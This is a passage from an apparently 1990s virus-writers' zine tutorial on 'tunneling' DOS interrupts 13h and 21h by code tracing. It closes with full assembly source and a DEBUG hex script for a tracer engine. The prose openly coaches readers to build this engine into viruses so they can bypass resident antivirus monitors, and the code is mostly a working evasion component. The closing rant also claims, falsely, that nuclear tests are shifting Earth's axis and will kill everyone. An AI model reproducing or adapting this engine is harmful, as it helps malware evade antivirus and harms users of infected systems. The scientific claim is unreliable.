This is because code tracing does not always find the original interrupt entrypoint, and if you don't have that, you can't bypass AV software in memory, meaning your virus will be detected. Meanwhile, you can't use single stepping because, quite frankly, it will be detected by the very AV software you need to bypass. What would you do in such a situation? Don't fret! There's two more documents left in this series remember? You have *MUCH* to learn before you start aiming so high as defense networks! Your best bet now is to simply wait for the other two documents and read them before adding the tunneling code into your virus :) One thing to remember, is that no matter how good anti-tracing code is in an AV tsr... it doesn't matter. Although tracers have flaws, they have one major advantage over conventional single step tunneling techniques, they cannot be detected. This means that, even if we DON'T find our original interrupt entrypoint from within our tracer, it doesn't matter, our presence, as far as AV software is concerned, is still concealed, which is, in many cases, very important. Alternatively, you can use a combination of BOTH single stepping and code tracing. For instance, you could tunnel in a certain distance (before any errors start coming up, but just after certain AV software hooks), and then start the single step routine. Or you could simply use the single step routine if your tracing routine was unsucessfull. Heck, you could make a SUPER tunneling virus, which uses every type of tunneling known to man (shown in all of my 4 documents, hehehe) one after the other, until it grabs the original entrypoint, starting with the undetectable ones, and going down to single step tunnelers (each using a different method of finding the original interrupt entrypoint). Yay! 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Section 10: Conclusion
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

As you can see, code tracing has both benefits over other methods, and pitfalls as well. In the next document in our series, you'll add to your tunneling method repertoire with many other miscellaneous methods, which have more reliability than code tracing with the same benefit of undetectability. You should keep the idea of complex mask tables fresh in your mind, as they'll make a comeback (either in the same format or a new and improved version) in the next document.

Once again, to round off the document, it's suggested you read and try out the example program I wrote. It is basically just everything you've learnt so far, with all the code from the document in a tunneling program so you can actually see the results of your tunnel. Code tracing is not affected by DESQview (except for being less reliable) so no checks for it are included in the program. With my version of DESQview, the code tracer handles it fine though :) How well your tunnelers work under DESQview is a good indicator of how they'll work in the wild, as DESQview uses some *VERY* tricky and spaghetti like code in its interrupt handlers.

So now that you know all there is to code tracers, I hereby dub thee a human. Yes, you have evolved past the stage of safe and pleasant marsupial like interaction with the environment to the supposedly 'better' stage of manipulating the environment to get what you want without regards to its health, slowly killing the planet and all other life on it. Congratulations, you can now contribute your filth to human society. Did you know that nuclear tests are SHIFTING the axis of the Earth slowly? This means that in a few years time, the earth will be tilted differently, which means all the seasons are going to change, the polar icecaps are going to melt, and basically, we're all going to die.
Now don't you wish you were a cockroach?

Anyway, once again, I hope you enjoyed this document as much as I hated writing it. I thought the last document was a fucker... but this was even worse. Do you have ANY idea how long it took me to get complex mask tables working, let alone the example tables themselves and all the tracing code? This document went through 3 complete rewrites, 5 major rewrites, and 3 main beta tests! The example CMT went through 2 complete rewrites and multiple separate updates.

The things I do for you people.

Methyl [Immortal Riot/Genesis]
=============================================================================
;=[BEGIN TUNNEL.ASM]=========================================================
;
;                   ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;                   ³               Tunneling               ³
;                   ³                 with                  ³
;                   ³             Code Tracing              ³
;                   ³                EXAMPLE                ³
;                   ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
; I just whipped up this example program so you can see how the engine
; that I have provided you works on tunneling i13 and i21 on your system,
; obviously lots could be optimized but since this is just an example and
; not a virus, size doesn't really matter.
; ; Methyl [Immortal Riot/Genesis] org 0100h mov b[scan_type], 1 mov ah, 9 lea dx, [i13_info] int 021h call scan_setup call trace_info push cs pop ds mov b[scan_type], 0 mov ah, 9 lea dx, [i21_info] int 021h call scan_setup call trace_info mov ax, 04c00h int 021h trace_info: push ds push cs pop ds cmp bl, 0 je trace_okay mov ah, 9 lea dx, [trace_fuckup_msg] int 021h pop ds ret trace_okay: mov ah, 9 lea dx, [trace_okay_msg] int 021h pop bx push si call bin_2_hex call print_colon pop bx call bin_2_hex ret i13_info: db 'Interrupt 13h trace -$' i21_info: db 0dh, 0ah, 'Interrupt 21h trace -$' trace_fuckup_msg: db ' failed$' trace_okay_msg: db ' traced to $' bin_2_hex: mov ch, 4 rotate: mov cl, 4 rol bx, cl mov al, bl and al, 0fh add al, 030h cmp al, '9'+1 jl print_it add al, 07h print_it: mov dl, al mov ah, 2 int 021h dec ch jnz rotate ret print_colon: mov ah, 2 mov dl, ':' int 021h ret entry_ax dw 0 ; AX on entry to table decoding routine cmp_loops db 0 ; number of CMPs left to process need_fixup db 0 ; FIXUP flag table_decoder proc near push cs pop es mov [es:entry_ax], ax lea di, [instruction_table_start] jmp decode_start decode_equal: cmp [es:need_fixup], 0 je no_fixup mov ax, [es:entry_ax] and ah, 011000111xb cmp ah, 0110xb jne no_fixup add dl, 2 no_fixup: mov al, dl cbw xor bx, bx ret decode_error: mov ax, 1 mov bx, 1 ret decode_start: cmp di, offset instruction_table_end je decode_error mov ax, [es:entry_ax] mov bl, [es:di] and bl, 01111xb mov [es:cmp_loops], bl mov cl, [es:di] mov bl, [es:di] and cl, 001000000xb mov [es:need_fixup], cl inc di and bl, 010000000xb jz byte_entry word_entry: mov bx, [es:di] and ax, bx inc di inc di word_do_cmp: mov dl, [es:di] and dl, 01111xb mov bx, [es:di+1] cmp ax, bx je _decode_equal dec [es:cmp_loops] jz word_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bx, [es:di+3] cmp ax, bx je _decode_equal add di, 5 dec [es:cmp_loops] jnz word_do_cmp jmp decode_start word_next_first: add di, 3 jmp decode_start _decode_equal: jmp 
decode_equal byte_entry: mov bl, [es:di] and al, bl inc di byte_do_cmp: mov dl, [es:di] and dl, 01111xb mov bl, [es:di+1] cmp al, bl je _decode_equal dec [es:cmp_loops] jz byte_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bl, [es:di+2] cmp al, bl je _decode_equal add di, 3 dec [es:cmp_loops] jnz byte_do_cmp jmp decode_start byte_next_first: inc di inc di jmp decode_start table_decoder endp instruction_table_start: db 000000001xb db 011110000xb db 000000001xb db 010010000xb ; CBW/CWD/POPF/PUSHF/SAHF/WAIT/CWDE/LAHF ; XCHG [reg, accumulator] db 000000001xb db 011110110xb db 000000001xb db 011110100xb ; CLD/STD/CMC/HLT db 000000011xb db 011111100xb db 000100001xb db 011111000xb ; CLC/STC/CLI/STI db 011100000xb ; LOOP[N]E/JCXZ db 000000001xb db 011110000xb ; REP[NE]/LOCK db 000000001xb db 011110100xb db 000100001xb db 010100100xb ; CMPS[B|W]/MOVS[B|W]/LODS[B|W]/SCAS[B|W] db 000000001xb db 011100000xb db 000000001xb db 001000000xb ; [DEC|INC|PUSH|POP] register db 000000001xb db 011000110xb db 000000001xb db 000000110xb ; AAA/AAS/DAA/DAS ; PUSH/POP [segment register] db 000000001xb db 011111000xb db 000000001xb db 010010000xb ; XCHG [register, accumulator] / NOP db 000000001xb db 011111110xb db 000000010xb db 011010100xb ; AAD/AAM [including wierd format] db 000000001xb db 011111110xb db 000000001xb db 001100000xb ; [PUSH|POP]A db 000000001xb db 011111110xb db 000000001xb db 010011100xb ; [POPF|PUSHF] db 000000010xb db 011111100xb db 000100001xb db 011101100xb db 011100100xb ; [IN|OUT] variable port|fixed port db 000000010xb db 011111101xb db 000010010xb db 011001101xb db 011001100xb ; IRET|INT [variable|3|overflow] db 000000001xb db 011111110xb db 000000001xb db 010101010xb ; STOS[B|W] db 000000001xb db 011111111xb db 000000001xb db 011010111xb ; XLAT db 011000100xb db 011111000xb, 011000000xb db 000110010xb db 011011000xb, 000000000xb db 011011000xb, 001000000xb db 000100100xb db 011011000xb, 010000000xb db 011011000xb, 011000000xb ; ESC db 011000100xb db 
011111110xb, 011000000xb db 000110010xb db 011000100xb, 000000000xb db 011000100xb, 001000000xb db 000100100xb db 011000100xb, 010000000xb db 011000100xb, 011000000xb ; LDS/LES db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 010001000xb, 000000000xb db 010001000xb, 001000000xb db 000100100xb db 010001000xb, 010000000xb db 010001000xb, 011000000xb ; MOV [reg/mem] with register db 000000001xb db 011111100xb db 000000011xb db 010100000xb ; MOV memory with accumulator db 000000010xb db 011111000xb db 000100011xb db 010111000xb db 010110000xb ; MOV reg, immediate db 000000010xb db 011111111xb db 000110010xb db 010101000xb db 010101001xb ; TEST accumulator, immediate db 011000100xb db 011000100xb, 011000000xb db 000110010xb db 000000000xb, 000000000xb db 000000000xb, 001000000xb db 000100100xb db 000000000xb, 010000000xb db 000000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem] with register db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 011010000xb, 000000000xb db 011010000xb, 001000000xb db 000100100xb db 011010000xb, 010000000xb db 011010000xb, 011000000xb ; [RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL] db 011000100xb db 011110100xb, 011000000xb db 000110010xb db 010000100xb, 000000000xb db 010000100xb, 001000000xb db 000100100xb db 010000100xb, 010000000xb db 010000100xb, 011000000xb ; XCHG/TEST/LEA/POP ; [register/memory], [register/memory] ; MOV [segreg/mem], [segreg/mem] db 011000100xb db 011111111xb, 011000000xb db 001000011xb db 010000011xb, 000000000xb db 010000011xb, 001000000xb db 000110110xb db 010000011xb, 010000000xb db 010000011xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) <-- WIERD format db 011001000xb db 011111101xb, 011000000xb db 001000011xb db 010000000xb, 000000000xb db 010000000xb, 001000000xb db 000110101xb db 010000000xb, 010000000xb db 010000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (byte) db 001010100xb db 010000001xb, 000000000xb db 
010000001xb, 001000000xb db 001000110xb db 010000001xb, 010000000xb db 010000001xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) ; Make sure WIERD series is handled first db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011000110xb, 000000000xb db 011000110xb, 001000000xb db 000110101xb db 011000110xb, 010000000xb db 011000110xb, 011000000xb ; MOV [reg/mem], immediate (byte) db 001010100xb db 011000111xb, 000000000xb db 011000111xb, 001000000xb db 001000110xb db 011000111xb, 010000000xb db 011000111xb, 011000000xb ; MOV [reg/mem], immediate (word) db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000110101xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; TEST [reg/mem], immediate (byte) db 001010100xb db 011110111xb, 000000000xb db 011110111xb, 001000000xb db 001000110xb db 011110111xb, 010000000xb db 011110111xb, 011000000xb ; TEST [reg/mem], immediate (word) db 000000010xb db 011000111xb db 000110010xb db 000000100xb db 000000101xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; acummulator, immediate db 011000100xb db 011110110xb, 011000000xb db 000110010xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000100100xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; [CALL|DEC|INC|JMP|PUSH|???] reg/memory ; [NOT|NEG|MUL|DIV|IMUL|IDIV|???] reg/memory ; Also handles TEST by accident... 
so make ; sure this is *AFTER* TEST cases have been ; handled else we'll use the wrong formula instruction_table_end: scan_type db 0 ; 0 = interrupt 21h scan ; 1 = interrupt 13h scan stack_top dw 0 ; do not POP past this point stack_bottom dw 0 ; do not PUSH past this point override db 02eh ; segment overrides variable loop_counter dw 0300h ; how many instructions (loops) we've processed first_mcb dw 0 ; abort when our segment is below this value (INT 21) temp_ip dw 0 ; temporary storage for stack searching temp_store dw 0, 0 ; temporary storage for stack searching global dw 0 ; global abort counter scan_setup: mov [cs:stack_top], sp lea ax, [offset program_end+020h] mov [cs:stack_bottom], ax mov [cs:loop_counter], 0300h mov ax, 070h cmp b[cs:scan_type], 1 je scan_13_setup mov ah, 052h int 021h mov ax, [es:bx-2] scan_13_setup: mov [cs:first_mcb], ax mov ax, 03513h int 021h cmp b[cs:scan_type], 1 je scan_13_i_setup mov ax, 03521h int 021h scan_13_i_setup: push es pop ds xchg bx, si xor ax, ax push ax push ax push ax scan_begin: mov [cs:override], 02eh mov ax, ds cmp b[cs:scan_type], 1 je scan_13_test cmp ax, [cs:first_mcb] jae scan_prefix jmp scan_hit_exit scan_13_test: cmp ax, [cs:first_mcb] jne scan_prefix scan_hit_exit: mov bl, 0 mov sp, [cs:stack_top] ret scan_prefix: dec [cs:loop_counter] jz do_ret_far dec [cs:global] jz global_error cmp si, 0fff0h jae do_ret_far mov ax, [si] push ax and al, 011100111xb cmp al, 000100110xb ; check for segment overrides pop ax je prefix_found push ax and al, 011110000xb cmp al, 001110000xb ; check for conditional jump series pop ax jne scan_ret_opcode do_conditional_jump: mov ax, si inc ax inc ax call call_finish jmp do_jump_short prefix_found: mov [cs:override], al inc si jnc scan_prefix jmp do_ret_far global_error: mov bl, 2 mov sp, [cs:stack_top] ret scan_ret_opcode: cmp al, 0cfh je do_ret_far ; check for IRET push ax and al, 011110110xb cmp al, 011000010xb ; check for RET[N|F] pop ax jne scan_flow_opcodes do_ret_far: mov ax, 
sp add ax, 6 cmp ax, [cs:stack_top] jae scan_root_exit pop si pop ds pop [cs:loop_counter] jmp scan_begin scan_root_exit: mov bl, 1 mov sp, [cs:stack_top] ret do_jump_short: mov al, [si+1] cbw add si, ax inc si inc si jmp scan_begin do_jump_near_immed: add si, [si+1] add si, 3 jmp scan_begin do_jump_far_immed: mov ax, [si+3] mov si, [si+1] mov ds, ax jmp scan_begin do_jump_near_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov si, [si] jmp scan_begin do_jump_far_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov ax, [si+2] mov si, [si] mov ds, ax jmp scan_begin scan_flow_opcodes: cmp al, 0ebh je do_jump_short cmp al, 0e9h je do_jump_near_immed cmp al, 0eah je do_jump_far_immed cmp al, 0ffh jne scan_flow_opcodes_next push ax and ah, 0110000xb cmp ah, 0100000xb pop ax jne scan_flow_opcodes_next push ax and ah, 011000111xb cmp ah, 000000110xb pop ax jne _do_ret_far ; weird JMP/CALLs we can't handle (which use ; registers, weird offset bytes, etc, etc, etc) cmp ah, 026h je do_jump_near_mem cmp ah, 02eh je do_jump_far_mem cmp ah, 016h je do_call_near_mem cmp ah, 01eh je do_call_far_mem scan_flow_opcodes_next: cmp al, 0e8h je do_call_near_immed cmp al, 09ah je do_call_far_immed scan_unknown_opcodes: call table_decoder cmp bx, 0 jne _do_ret_far add si, ax jc _do_ret_far jmp scan_begin _do_ret_far: jmp do_ret_far do_call_near_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_near_mem do_call_near_immed: call call_setup add ax, 3 jc _do_ret_far call call_finish jmp do_jump_near_immed do_call_far_immed: call call_setup add ax, 5 jc _do_ret_far call call_finish jmp do_jump_far_immed do_call_far_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_far_mem call_setup: pop bx mov ax, sp sub ax, 6 cmp ax, [cs:stack_bottom] jbe _stack_error mov ax, si push bx ret _stack_error: mov bl, 3 mov sp, [cs:stack_top] ret call_finish: pop [cs:temp_ip] mov [cs:temp_store], ax mov [cs:temp_store+2], ds push ss pop ds 
xchg si, bp mov si, sp mov bx, si call_loop: lodsw cmp ax, [cs:temp_store] jne call_nomatch lodsw cmp ax, [cs:temp_store+2] je call_match_found call_nomatch: add bx, 6 mov si, bx cmp si, [cs:stack_top] jb call_loop call_exit: push [cs:loop_counter] mov ax, [cs:temp_store+2] push ax push [cs:temp_store] push [cs:temp_ip] xchg bp, si mov ds, ax ret call_match_found: mov si, [cs:temp_store] mov ax, [cs:temp_store+2] mov ds, ax jmp scan_begin program_end: ;=[END TUNNEL.ASM]=========================================================== ;=[BEGIN TUNNEL.SCR]========================================================= N TUNNEL.COM E 0100 C6 06 8B 03 01 B4 09 BA 50 01 CD 21 E8 8E 02 E8 E 0110 19 00 0E 1F C6 06 8B 03 00 B4 09 BA 66 01 CD 21 E 0120 E8 7A 02 E8 05 00 B8 00 4C CD 21 1E 0E 1F 80 FB E 0130 00 74 09 B4 09 BA 7E 01 CD 21 1F C3 B4 09 BA 86 E 0140 01 CD 21 5B 56 E8 4A 00 E8 64 00 5B E8 43 00 C3 E 0150 49 6E 74 65 72 72 75 70 74 20 31 33 68 20 74 72 E 0160 61 63 65 20 2D 24 0D 0A 49 6E 74 65 72 72 75 70 E 0170 74 20 32 31 68 20 74 72 61 63 65 20 2D 24 20 66 E 0180 61 69 6C 65 64 24 20 74 72 61 63 65 64 20 74 6F E 0190 20 24 B5 04 B1 04 D3 C3 8A C3 24 0F 04 30 3C 3A E 01A0 7C 02 04 07 8A D0 B4 02 CD 21 FE CD 75 E6 C3 B4 E 01B0 02 B2 3A CD 21 C3 00 00 00 00 0E 07 26 A3 B6 01 E 01C0 BF 8E 02 E9 24 00 26 80 3E B9 01 00 74 0F 26 A1 E 01D0 B6 01 80 E4 C7 80 FC 06 75 03 80 C2 02 8A C2 98 E 01E0 33 DB C3 B8 01 00 BB 01 00 C3 81 FF 8B 03 74 F3 E 01F0 26 A1 B6 01 26 8A 1D 80 E3 0F 26 88 1E B8 01 26 E 0200 8A 0D 26 8A 1D 80 E1 40 26 88 0E B9 01 47 80 E3 E 0210 80 74 3F 26 8B 1D 21 D8 47 47 26 8A 15 80 E2 0F E 0220 26 8B 5D 01 39 D8 74 27 26 FE 0E B8 01 74 1B 26 E 0230 8A 15 B1 04 D2 EA 26 8B 5D 03 39 D8 74 11 83 C7 E 0240 05 26 FE 0E B8 01 75 D2 EB A0 83 C7 03 EB 9B E9 E 0250 74 FF 26 8A 1D 20 D8 47 26 8A 15 80 E2 0F 26 8A E 0260 5D 01 38 D8 74 E9 26 FE 0E B8 01 74 1C 26 8A 15 E 0270 B1 04 D2 EA 26 8A 5D 02 38 D8 74 D3 83 C7 03 26 E 0280 FE 0E B8 01 75 D2 E9 61 FF 47 47 E9 5C FF 01 F0 
E 0290 01 90 01 F6 01 F4 03 FC 21 F8 E0 01 F0 01 F4 21 E 02A0 A4 01 E0 01 40 01 C6 01 06 01 F8 01 90 01 FE 02 E 02B0 D4 01 FE 01 60 01 FE 01 9C 02 FC 21 EC E4 02 FD E 02C0 12 CD CC 01 FE 01 AA 01 FF 01 D7 C4 F8 C0 32 D8 E 02D0 00 D8 40 24 D8 80 D8 C0 C4 FE C0 32 C4 00 C4 40 E 02E0 24 C4 80 C4 C0 C4 FC C0 32 88 00 88 40 24 88 80 E 02F0 88 C0 01 FC 03 A0 02 F8 23 B8 B0 02 FF 32 A8 A9 E 0300 C4 C4 C0 32 00 00 00 40 24 00 80 00 C0 C4 FC C0 E 0310 32 D0 00 D0 40 24 D0 80 D0 C0 C4 F4 C0 32 84 00 E 0320 84 40 24 84 80 84 C0 C4 FF C0 43 83 00 83 40 36 E 0330 83 80 83 C0 C8 FD C0 43 80 00 80 40 35 80 80 80 E 0340 C0 54 81 00 81 40 46 81 80 81 C0 C8 FF C0 43 C6 E 0350 00 C6 40 35 C6 80 C6 C0 54 C7 00 C7 40 46 C7 80 E 0360 C7 C0 C8 FF C0 43 F6 00 F6 40 35 F6 80 F6 C0 54 E 0370 F7 00 F7 40 46 F7 80 F7 C0 02 C7 32 04 05 C4 F6 E 0380 C0 32 F6 00 F6 40 24 F6 80 F6 C0 00 00 00 00 00 E 0390 2E 00 03 00 00 00 00 00 00 00 00 00 00 2E 89 26 E 03A0 8C 03 B8 D6 05 2E A3 8E 03 2E C7 06 91 03 00 03 E 03B0 B8 70 00 2E 80 3E 8B 03 01 74 08 B4 52 CD 21 26 E 03C0 8B 47 FE 2E A3 93 03 B8 13 35 CD 21 2E 80 3E 8B E 03D0 03 01 74 05 B8 21 35 CD 21 06 1F 87 F3 33 C0 50 E 03E0 50 50 2E C6 06 90 03 2E 8C D8 2E 80 3E 8B 03 01 E 03F0 74 0A 2E 3B 06 93 03 73 12 E9 07 00 2E 3B 06 93 E 0400 03 75 08 B3 00 2E 8B 26 8C 03 C3 2E FF 0E 91 03 E 0410 74 46 2E FF 0E 9B 03 74 2B 83 FE F0 73 3A 8B 04 E 0420 50 24 E7 3C 26 58 74 12 50 24 F0 3C 70 58 75 1C E 0430 8B C6 40 40 E8 26 01 E9 3C 00 2E A2 90 03 46 73 E 0440 CA E9 14 00 B3 02 2E 8B 26 8C 03 C3 3C CF 74 08 E 0450 50 24 F6 3C C2 58 75 62 89 E0 05 06 00 2E 3B 06 E 0460 8C 03 73 0A 5E 1F 2E 8F 06 91 03 E9 74 FF B3 01 E 0470 2E 8B 26 8C 03 C3 8A 44 01 98 01 C6 46 46 E9 61 E 0480 FF 03 74 01 83 C6 03 E9 58 FF 8B 44 03 8B 74 01 E 0490 8E D8 E9 4D FF 2E 80 3E 90 03 2E 75 BB 8B 74 02 E 04A0 8B 34 E9 3D FF 2E 80 3E 90 03 2E 75 AB 8B 74 02 E 04B0 8B 44 02 8B 34 8E D8 E9 28 FF 3C EB 74 B8 3C E9 E 04C0 74 BF 3C EA 74 C4 3C FF 75 28 50 80 E4 30 80 FC E 04D0 20 58 75 1E 
50 80 E4 C7 80 FC 06 58 75 2B 80 FC E 04E0 26 74 B2 80 FC 2E 74 BD 80 FC 16 74 1F 80 FC 1E E 04F0 74 44 3C E8 74 24 3C 9A 74 2E E8 BD FC 83 FB 00 E 0500 75 07 01 C6 72 03 E9 D9 FE E9 4C FF E8 35 00 05 E 0510 04 00 72 F5 E8 46 00 E9 7B FF E8 27 00 05 03 00 E 0520 72 E7 E8 38 00 E9 59 FF E8 19 00 05 05 00 72 D9 E 0530 E8 2A 00 E9 54 FF E8 0B 00 05 04 00 72 CB E8 1C E 0540 00 E9 61 FF 5B 89 E0 2D 06 00 2E 3B 06 8E 03 76 E 0550 04 8B C6 53 C3 B3 03 2E 8B 26 8C 03 C3 2E 8F 06 E 0560 95 03 2E A3 97 03 2E 8C 1E 99 03 16 1F 87 EE 8B E 0570 F4 89 F3 AD 2E 3B 06 97 03 75 08 AD 2E 3B 06 99 E 0580 03 74 25 83 C3 06 89 DE 2E 3B 36 8C 03 72 E4 2E E 0590 FF 36 91 03 2E A1 99 03 50 2E FF 36 97 03 2E FF E 05A0 36 95 03 87 F5 8E D8 C3 2E 8B 36 97 03 2E A1 99 E 05B0 03 8E D8 E9 2C FE RCX 04B6 W Q ;=[END TUNNEL.SCR]===========================================================